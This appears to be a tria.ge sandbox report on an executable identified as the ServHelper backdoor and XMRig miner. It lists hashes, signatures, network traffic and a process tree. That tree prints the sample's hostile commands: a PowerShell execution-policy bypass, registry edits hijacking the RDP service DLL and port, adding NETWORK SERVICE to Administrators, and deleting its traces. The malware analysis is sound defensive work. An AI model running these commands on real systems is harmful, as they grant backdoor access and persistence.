Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

cb3cc55156...69.exe

windows7_x64

1

cb3cc55156...69.exe

windows10_x64

10

Analysis

  • max time kernel
    95s
  • max time network
    120s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    10/10/2021, 11:58 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cb3cc551561883ab8fc4fb6fc837a469.exe

  • Size

    4.0MB

  • MD5

    cb3cc551561883ab8fc4fb6fc837a469

  • SHA1

    f74ae6d243342099d3fa500cbc630f4a244a8d82

  • SHA256

    ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb

  • SHA512

    b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1

Score
10/10
servhelperxmrigbackdoorminerpersistencetrojan

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe
    "C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v3nplro\5v3nplro.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5v3nplro\CSCB864D1E737C475DBB2095527C87833.TMP"
          4⤵
            PID:1144
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3424
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1600
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4052
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1548
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3632
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3200
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:408
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2488
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3312
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2344
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1756
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2328
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1744
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2000
                    • C:\Windows\SysWOW64\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4020
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1936
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:1840
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2380

                  Network

                  • flag-us
                    DNS
                    time.windows.com
                    Remote address:
                    8.8.8.8:53
                    Request
                    time.windows.com
                    IN A
                    Response
                    time.windows.com
                    IN CNAME
                    time.microsoft.akadns.net
                    time.microsoft.akadns.net
                    IN A
                    20.101.57.9
                  • 8.253.208.121:80
                    322 B
                     7
                  • 51.104.15.252:443
                    322 B
                     7
                  • 8.8.8.8:53
                    time.windows.com
                    dns
                    62 B
                     117 B
                     1
                    1

                    DNS Request

                    time.windows.com

                    DNS Response

                    20.101.57.9

                  • 20.101.57.9:123
                    time.windows.com
                    ntp
                    76 B
                     1

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/1572-134-0x0000000008300000-0x0000000008301000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-128-0x0000000003540000-0x0000000003541000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-130-0x0000000007870000-0x0000000007871000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-131-0x0000000007F00000-0x0000000007F01000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-132-0x00000000080A0000-0x00000000080A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-177-0x0000000009A70000-0x0000000009A71000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-135-0x0000000008180000-0x0000000008181000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-136-0x00000000086D0000-0x00000000086D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-138-0x0000000004E62000-0x0000000004E63000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-137-0x0000000004E60000-0x0000000004E61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-139-0x0000000008930000-0x0000000008931000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-156-0x0000000004E63000-0x0000000004E64000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-141-0x0000000003540000-0x0000000003541000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-145-0x0000000009CF0000-0x0000000009CF1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-146-0x00000000096A0000-0x00000000096A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-127-0x0000000003540000-0x0000000003541000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-154-0x00000000074C0000-0x00000000074C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-1128-0x000000007E230000-0x000000007E231000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-129-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1600-444-0x00000000066C0000-0x00000000066C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1600-445-0x00000000066C2000-0x00000000066C3000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1600-542-0x000000007E930000-0x000000007E931000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-124-0x0000000007A00000-0x0000000007A01000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-123-0x0000000005E90000-0x0000000005E91000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-125-0x00000000054F4000-0x00000000054F5000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-115-0x0000000000D60000-0x0000000000D61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-121-0x0000000006200000-0x0000000006201000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-122-0x0000000005EA0000-0x0000000005EA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-120-0x00000000054F3000-0x00000000054F4000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-119-0x00000000054F2000-0x00000000054F3000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-118-0x00000000054F0000-0x00000000054F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-117-0x0000000005900000-0x0000000005CFF000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3424-214-0x000000007F990000-0x000000007F991000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-192-0x0000000003280000-0x0000000003281000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-184-0x0000000007252000-0x0000000007253000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-182-0x0000000007250000-0x0000000007251000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-179-0x0000000003280000-0x0000000003281000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-180-0x0000000003280000-0x0000000003281000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4052-698-0x0000000006A22000-0x0000000006A23000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4052-777-0x000000007E3E0000-0x000000007E3E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4052-697-0x0000000006A20000-0x0000000006A21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  We care about your privacy.

                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.